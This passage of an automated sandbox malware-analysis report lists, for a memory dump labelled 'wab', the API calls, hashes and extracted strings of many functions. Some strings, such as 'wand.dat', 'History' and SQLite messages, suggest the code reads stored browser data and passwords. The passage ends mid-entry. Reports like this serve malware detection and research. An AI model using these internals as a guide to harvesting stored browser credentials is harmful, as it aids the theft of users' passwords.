                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                      • API String ID: 3510742995-272990098
                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: gj
                                      • API String ID: 1297977491-4203073231
                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                      APIs
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                      APIs
                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                      • malloc.MSVCRT ref: 004174BD
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                      • String ID:
                                      • API String ID: 2903831945-0
                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                      APIs
                                      • GetParent.USER32(?), ref: 0040D453
                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Rect$ClientParentPoints
                                      • String ID:
                                      • API String ID: 4247780290-0
                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                      • memset.MSVCRT ref: 004450CD
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                      • String ID:
                                      • API String ID: 1471605966-0
                                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                      APIs
                                      • wcscpy.MSVCRT ref: 0044475F
                                      • wcscat.MSVCRT ref: 0044476E
                                      • wcscat.MSVCRT ref: 0044477F
                                      • wcscat.MSVCRT ref: 0044478E
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                      • String ID: \StringFileInfo\
                                      • API String ID: 102104167-2245444037
                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$??3@
                                      • String ID: g4@
                                      • API String ID: 3314356048-2133833424
                                      • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                      • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _memicmpwcslen
                                      • String ID: @@@@$History
                                      • API String ID: 1872909662-685208920
                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                      APIs
                                      • memset.MSVCRT ref: 004100FB
                                      • memset.MSVCRT ref: 00410112
                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                      • _snwprintf.MSVCRT ref: 00410141
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                      • String ID: </%s>
                                      • API String ID: 3400436232-259020660
                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                      APIs
                                      • memset.MSVCRT ref: 0040D58D
                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ChildEnumTextWindowWindowsmemset
                                      • String ID: caption
                                      • API String ID: 1523050162-4135340389
                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                      APIs
                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                      • String ID: MS Sans Serif
                                      • API String ID: 210187428-168460110
                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ClassName_wcsicmpmemset
                                      • String ID: edit
                                      • API String ID: 2747424523-2167791130
                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                      • String ID: SHAutoComplete$shlwapi.dll
                                      • API String ID: 3150196962-1506664499
                                      • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                      • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                      • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                      • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp
                                      • String ID:
                                      • API String ID: 3384217055-0
                                      • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                      • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                      • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$memcpy
                                      • String ID:
                                      • API String ID: 368790112-0
                                      • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                      • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                      • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                      • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                      APIs
                                        • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                        • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                        • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                        • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                      • GetMenu.USER32(?), ref: 00410F8D
                                      • GetSubMenu.USER32(00000000), ref: 00410F9A
                                      • GetSubMenu.USER32(00000000), ref: 00410F9D
                                      • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                      • String ID:
                                      • API String ID: 1889144086-0
                                      • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                      • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                      • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                      • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                      APIs
                                      • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                      • GetLastError.KERNEL32 ref: 0041810A
                                      • CloseHandle.KERNEL32(00000000), ref: 00418120
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateErrorHandleLastMappingView
                                      • String ID:
                                      • API String ID: 1661045500-0
                                      • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                      • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                      • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                      • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                      APIs
                                        • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                      • memcpy.MSVCRT ref: 0042EC7A
                                      Strings
                                      • Cannot add a column to a view, xrefs: 0042EBE8
                                      • virtual tables may not be altered, xrefs: 0042EBD2
                                      • sqlite_altertab_%s, xrefs: 0042EC4C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                      • API String ID: 1297977491-2063813899
                                      • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                      • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                      • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                      APIs
                                      • memset.MSVCRT ref: 0040560C
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                        • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                      • String ID: *.*$dat$wand.dat
                                      • API String ID: 2618321458-1828844352
                                      • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                      • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                      APIs
                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                      • wcslen.MSVCRT ref: 00410C74
                                      • _wtoi.MSVCRT ref: 00410C80
                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                      • String ID:
                                      • API String ID: 1549203181-0
                                      • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                      • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                      APIs
                                      • memset.MSVCRT ref: 00412057
                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                      • String ID:
                                      • API String ID: 3550944819-0
                                      • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                      • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                      APIs
                                      • wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                      • memcpy.MSVCRT ref: 0040A94F
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2602640467.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$memcpy$mallocwcslen
                                      • String ID:
                                      • API String ID: 3023356884-0
                                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                      APIs
                                      • wcslen.MSVCRT ref: 0040B1DE
                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                        • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                        • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
